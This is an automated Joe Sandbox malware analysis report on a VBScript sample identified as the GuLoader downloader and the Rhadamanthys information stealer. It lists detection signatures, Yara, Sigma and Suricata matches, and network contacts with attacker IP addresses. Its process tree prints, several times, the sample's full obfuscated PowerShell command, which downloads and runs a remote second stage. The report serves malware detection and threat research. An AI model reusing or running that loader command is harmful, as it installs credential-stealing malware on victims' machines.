Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
payload_1.vbs

Overview

General Information

Sample name:payload_1.vbs
Analysis ID:1569005
MD5:4425add7dd6545a83437150686d4c683
SHA1:84841a01eca1d72f4aa4ba46c1fee87c6399826f
SHA256:143524bd089f91b6b550dfeb3b6b5c14640af652c42e5cbcebbbc9efc15a2661
Tags:Listofrequireditemsvbsuser-JAMESWT_MHT
Infos:

Detection

GuLoader, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Dllhost Internet Connection
Sigma detected: Msiexec Initiated Connection
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6628 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payload_1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WMIC.exe (PID: 6700 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7020 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (Mareschal 'C sE.TSoaBarBotD.-OiS SL SeRre,rp S L4');Dilemmatically (Mareschal 'Bu$ GM.L.oO VBCoADil k:OfvB,iH R ouDeSW SUdEReNR s B=Aa(R th e iShat.n- P.oaFlT H S Ha$B fSao srSan EjToEN dS eopS )') ;Dilemmatically (Mareschal 'L.$BrGunlKjOudBMea BlH.:Vag COBllModPaBCiEPrRBuR YCa=.e$ougImlTaOV bP,A kLNi: OgMilTyaAbmDeOInrSvIMoz aASlt.fi UOP.NMeSUn+He+ a%,k$ Sc .HM aUdpCalSeeH,SSwsD..CocBaoOluPrNsst') ;$Partisk=$Chapless[$Goldberry]}$Overmaling=304709;$Brudfladerne=28809;Dilemmatically (Mareschal ' P$ aG L,toAbBS AVaL V:SyUSmNWoBs A r BE aStR oo CU SsDd .e=st Apg FESktTy- oc oOIfn ITDee N utIs $Atfnoo.tRSpn rj aEDaDA E Ns');Dilemmatically (Mareschal ' L$Tog.elsmo eb taVilAf:C.UocnsuiI vO,eWhr sSoaTelWhs t or om,kfrooLyr PsskyKonPoiD nC gTye r Tr=Ma Al[RaS Ry,uscyt tePemPs.FoCO o nWovOdeMorPltSt]Ut:Bo:FlF erGroN mPrB Aa MsC.e v6Bi4OvS,otflrPei PnbigO,( G$PaU TnI b Ba urKnbC aInr .o uSisPr)');Dilemmatically (Mareschal ' $HeG.tLKaoU,BBiAMoLA.:n bT,RamIZyG i .tJ Tst an=En .a[SesNoYDdS rTIneSoMAa.EltFieecXAuTHu. aeEnnP C Ao edhyiBenPigKl]Ks:Bi:OuA rSprc ,i iBi.D,GEnE .Tc SMbTexrSoIKlnKugMe( O$PruS N ,iDov teMurS SSvaShL.rSHatA RrimK FDeOKrrOvs PY n SI.oNt G,ueStr T)');Dilemmatically (Mareschal ' A$ ,g,il OOSeBStAAnlhu:Sts UtSkiTokLanG.a.uREaKB,OT M maEnn fe SRL,N,rEStsSo= m$ oB Ar I CG CIGaTT TBr.ArSAnUPrbTysTrtunRReiB nExg P(Sp$NaOOrV eeTirH,M ACoL,eispnM Gco,.r$ TBKrR puJuDL FcrlAgABaDM eK,R tNNeeB,)');Dilemmatically $Stiknarkomanernes;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 984 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (Mareschal 'C sE.TSoaBarBotD.-OiS SL SeRre,rp S L4');Dilemmatically (Mareschal 'Bu$ GM.L.oO VBCoADil k:OfvB,iH R ouDeSW SUdEReNR s B=Aa(R th e iShat.n- P.oaFlT H S Ha$B fSao srSan EjToEN dS eopS )') ;Dilemmatically (Mareschal 'L.$BrGunlKjOudBMea BlH.:Vag COBllModPaBCiEPrRBuR YCa=.e$ougImlTaOV bP,A kLNi: OgMilTyaAbmDeOInrSvIMoz aASlt.fi UOP.NMeSUn+He+ a%,k$ Sc .HM aUdpCalSeeH,SSwsD..CocBaoOluPrNsst') ;$Partisk=$Chapless[$Goldberry]}$Overmaling=304709;$Brudfladerne=28809;Dilemmatically (Mareschal ' P$ aG L,toAbBS AVaL V:SyUSmNWoBs A r BE aStR oo CU SsDd .e=st Apg FESktTy- oc oOIfn ITDee N utIs $Atfnoo.tRSpn rj aEDaDA E Ns');Dilemmatically (Mareschal ' L$Tog.elsmo eb taVilAf:C.UocnsuiI vO,eWhr sSoaTelWhs t or om,kfrooLyr PsskyKonPoiD nC gTye r Tr=Ma Al[RaS Ry,uscyt tePemPs.FoCO o nWovOdeMorPltSt]Ut:Bo:FlF erGroN mPrB Aa MsC.e v6Bi4OvS,otflrPei PnbigO,( G$PaU TnI b Ba urKnbC aInr .o uSisPr)');Dilemmatically (Mareschal ' $HeG.tLKaoU,BBiAMoLA.:n bT,RamIZyG i .tJ Tst an=En .a[SesNoYDdS rTIneSoMAa.EltFieecXAuTHu. aeEnnP C Ao edhyiBenPigKl]Ks:Bi:OuA rSprc ,i iBi.D,GEnE .Tc SMbTexrSoIKlnKugMe( O$PruS N ,iDov teMurS SSvaShL.rSHatA RrimK FDeOKrrOvs PY n SI.oNt G,ueStr T)');Dilemmatically (Mareschal ' A$ ,g,il OOSeBStAAnlhu:Sts UtSkiTokLanG.a.uREaKB,OT M maEnn fe SRL,N,rEStsSo= m$ oB Ar I CG CIGaTT TBr.ArSAnUPrbTysTrtunRReiB nExg P(Sp$NaOOrV eeTirH,M ACoL,eispnM Gco,.r$ TBKrR puJuDL FcrlAgABaDM eK,R tNNeeB,)');Dilemmatically $Stiknarkomanernes;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5660 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • svchost.exe (PID: 3328 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • svchost.exe (PID: 3084 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • chrome.exe (PID: 796 cmdline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chrBC15.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/1aeadd7b/4a1b3c1a" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 4020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2488,i,17319326758939712999,7125565057770333449,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • wmpnscfg.exe (PID: 3332 cmdline: "C:\Program Files\Windows Media Player\wmpnscfg.exe" MD5: F912FF78DE347834EA56CEB0E12F80EC)
            • dllhost.exe (PID: 7084 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • svchost.exe (PID: 4548 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000003.2013624031.00000000007A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000005.00000002.1960598330.0000000008EF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000A.00000003.2008744102.0000000002E50000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        0000000A.00000003.2012882600.0000000022C10000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000000A.00000003.2012533041.00000000229F0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            11.3.svchost.exe.4d00000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              10.3.msiexec.exe.22c10000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                11.3.svchost.exe.4d00000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  10.3.msiexec.exe.229f0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    11.3.svchost.exe.4ae0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_7020.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi32_984.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                        • 0xbd58:$b2: ::FromBase64String(
                        • 0xaddc:$s1: -join
                        • 0x4588:$s4: +=
                        • 0x464a:$s4: +=
                        • 0x8871:$s4: +=
                        • 0xa98e:$s4: +=
                        • 0xac78:$s4: +=
                        • 0xadbe:$s4: +=
                        • 0x147cb:$s4: +=
                        • 0x1484b:$s4: +=
                        • 0x14911:$s4: +=
                        • 0x14991:$s4: +=
                        • 0x14b67:$s4: +=
                        • 0x14beb:$s4: +=
                        • 0xb5f0:$e4: Get-WmiObject
                        • 0xb7df:$e4: Get-Process
                        • 0xb837:$e4: Start-Process
                        • 0x15457:$e4: Get-Process

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payload_1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payload_1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payload_1.vbs", ProcessId: 6628, ProcessName: wscript.exe
                        Sigma detected: Dllhost Internet Connection
                        Source: Network ConnectionAuthor: bartblaze: Data: DestinationIp: 45.149.241.141, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 7084, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49799
                        Sigma detected: Msiexec Initiated Connection
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 202.71.109.228, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5660, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5660, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3328, ProcessName: svchost.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payload_1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payload_1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\payload_1.vbs", ProcessId: 6628, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (Mareschal 'C sE.TSoaBarBotD.-OiS SL SeRre,rp S L4');Dilemmatically (Mareschal 'Bu$ GM.L.
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4548, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T10:46:56.026871+010028548242Potentially Bad Traffic45.149.241.1412023192.168.2.449748TCP
                        2024-12-05T10:47:07.827834+010028548242Potentially Bad Traffic45.149.241.1412023192.168.2.449778TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
